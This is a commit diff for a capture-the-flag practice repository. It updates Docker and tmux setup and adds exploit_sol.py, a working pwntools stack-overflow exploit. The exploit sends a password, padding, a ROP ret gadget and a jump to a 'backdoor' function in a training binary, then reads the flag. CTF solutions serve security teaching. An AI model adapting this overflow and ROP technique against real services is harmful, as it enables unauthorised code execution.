Using pwntools docker image for the 'CTF' container

README.md

@@ -16,4 +16,14 @@ There is also a whole playlist using challenges from https://exploit.education.
 
 # More Docker Videos
 - [How Docker Works - Intro to Namespaces](https://www.youtube.com/watch?v=-YnMr1lj4Z8)
-- [Deepdive Containers - Kernel Sources and nsenter](https://www.youtube.com/watch?v=sHp0Q3rvamk)
+- [Deepdive Containers - Kernel Sources and nsenter](https://www.youtube.com/watch?v=sHp0Q3rvamk)
+
+# Improvement
+
+Build the ctf container(s), and start with ```docker run --rm -it -v `pwd`:/home/pwntools pwn tmux``` (Credits for the great and simple Dockerfile, tmux config and geff for pwn: https://github.com/Z6543/hackersuli_pwntools)
+If you run the containers on remote vps, you can use code-server to edit the code in you browser: ```docker run -it --rm --name code-server -d -p 8081:8080 \
+  -v "`pwd`/.vs-config:/root/.config" \
+  -v "`pwd`:/home/coder/project" \
+  -u "$(id -u):$(id -g)" \
+  -e "DOCKER_USER=$USER" \
+  codercom/code-server:latest```

challenge/.gdbinit

@@ -0,0 +1 @@
+source /home/pwntools/.gdbinit-gef.py

challenge/.tmux.conf

@@ -0,0 +1,3 @@
+set -g mouse on
+set -g default-shell /bin/bash
+PS1="\u@\h:\w \$ "

challenge/Dockerfile

@@ -1,7 +1,7 @@
 # sudo docker build -t system_health_check .
 # sudo docker run -d -p 1024:1024 --rm -it system_health_check
 
-FROM ubuntu:19.10
+FROM ubuntu:20.04
 
 RUN apt-get update
 

challenge/exploit_sol.py

@@ -0,0 +1,76 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template --host 192.168.88.33 --port 1024
+from pwn import *
+
+os.environ['XDG_CACHE_HOME'] = '/tmp' # some docker glitch fix
+
+# Set up pwntools for the correct architecture
+context.update(arch='i386')
+exe = context.binary = ELF('system_health_check')
+context.terminal = ['tmux','splitw','-h']
+
+# Many built-in settings can be controlled on the command-line and show up
+# in "args".  For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+# ./exploit.py GDB HOST=example.com PORT=4141
+host = args.HOST or '192.168.88.33'
+port = int(args.PORT or 1024)
+
+def start_local(argv=[], *a, **kw):
+    '''Execute the target binary locally'''
+    if args.GDB:
+        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
+    else:
+        return process([exe.path] + argv, *a, **kw)
+
+def start_remote(argv=[], *a, **kw):
+    '''Connect to the process on the remote host'''
+    io = connect(host, port)
+    if args.GDB:
+        gdb.attach(io, gdbscript=gdbscript)
+    return io
+
+def start(argv=[], *a, **kw):
+    '''Start the exploit against the target.'''
+    if args.LOCAL:
+        return start_local(argv, *a, **kw)
+    else:
+        return start_remote(argv, *a, **kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+continue
+'''.format(**locals())
+
+#===========================================================
+#                    EXPLOIT GOES HERE
+#===========================================================
+
+padding = b"A"*cyclic_find("acla")
+payload = padding
+
+
+io = start()
+
+# MOVAPS issue
+rop = ROP(exe)
+ret_gadget = rop.ret
+print(ret_gadget.address)
+payload += p64(ret_gadget.address) 
+
+payload += p64(exe.symbols["backdoor"])
+
+
+io.clean()
+# payload = cyclic(0xff+0xf) # find padding
+io.sendline(b"sUp3r_S3cr3T_P4s5w0rD\x00"+payload)
+io.recv(timeout = 2)
+io.sendline("cat flag\n")
+io.interactive()
+
+

ctf/Dockerfile

@@ -1,21 +1,4 @@
-# docker build -t ctf:ubuntu19.10 .
-# If using Windows
-      # docker run --rm -v %cd%:/pwd --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -d --name ctf -i ctf:ubuntu19.10
-# If using Linux    
-      # docker run --rm -v $PWD:/pwd --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -d --name ctf -i ctf:ubuntu19.10
-# docker exec -it ctf /bin/bash
+FROM pwntools/pwntools:latest
 
-FROM ubuntu:19.10
-ENV LC_CTYPE C.UTF-8
-ENV DEBIAN_FRONTEND=noninteractive
-RUN dpkg --add-architecture i386 && \
-apt-get update && \
-apt-get install -y build-essential jq strace ltrace curl wget rubygems gcc dnsutils netcat gcc-multilib net-tools vim gdb gdb-multiarch python python3 python3-pip python3-dev libssl-dev libffi-dev wget git make procps libpcre3-dev libdb-dev libxt-dev libxaw7-dev python-pip libc6:i386 libncurses5:i386 libstdc++6:i386 && \
-pip install capstone requests pwntools r2pipe && \
-pip3 install pwntools keystone-engine unicorn capstone ropper && \
-mkdir tools && cd tools && \
-git clone https://github.com/JonathanSalwan/ROPgadget && \
-git clone https://github.com/radare/radare2 && cd radare2 && sys/install.sh && \
-cd .. && git clone https://github.com/pwndbg/pwndbg && cd pwndbg && git checkout stable && ./setup.sh && \
-cd .. && git clone https://github.com/niklasb/libc-database && cd libc-database && ./get && \
-gem install one_gadget
+RUN sudo apt update
+RUN sudo apt install -y gdb net-tools gdbserver tmux netcat